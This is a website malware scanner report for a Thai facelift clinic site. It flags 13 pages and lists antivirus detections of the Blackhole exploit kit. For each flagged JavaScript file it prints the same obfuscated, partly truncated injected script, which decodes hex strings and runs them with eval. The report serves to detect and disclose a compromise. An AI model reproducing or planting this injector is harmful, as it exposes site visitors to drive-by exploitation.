Malware Scanner report for facelift-thailand.com

Malicious/Suspicious/Total urls checked: 13/0/15

13 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "facelift-thailand.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=facelift-thailand.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://facelift-thailand.com/	200 OK Content-Length: 43356 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) jxhfo="s"+"p"+"li"+"t";iwz=window;ghsbtk="dy";cuylf=document;dhczd="0x";cnbhfa=(5-3-1);try{++(cuylf.body)}catch(qkqcgk){mjk=false;try{}catch(ogmh){mjk=21;} if(1){gwx="17:5d:6c:65:5a:6b:60:66:65:17:69:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:69:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64 ...[4013 bytes skipped]... Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js	200 OK Content-Length: 72174 Content-Type: text/javascript	clean
http://facelift-thailand.com/x-js/jquery.js	200 OK Content-Length: 79143 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-js/jquery.jqtransform.js	200 OK Content-Length: 18134 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-js/droplinemenu.js	200 OK Content-Length: 6684 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-js/easySlider1.5.js	200 OK Content-Length: 8856 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-js/common.js	200 OK Content-Length: 6320 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-fancybox/jquery.mousewheel-3.0.2.pack.js	200 OK Content-Length: 5608 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-fancybox/jquery.fancybox-1.3.1.js	200 OK Content-Length: 28732 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-js/jquery.validationEngine-en.js	200 OK Content-Length: 6708 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-js/jquery.validationEngine.js	200 OK Content-Length: 28805 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-js/jquery-ui-1.8.2.custom.min.js	200 OK Content-Length: 42536 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE 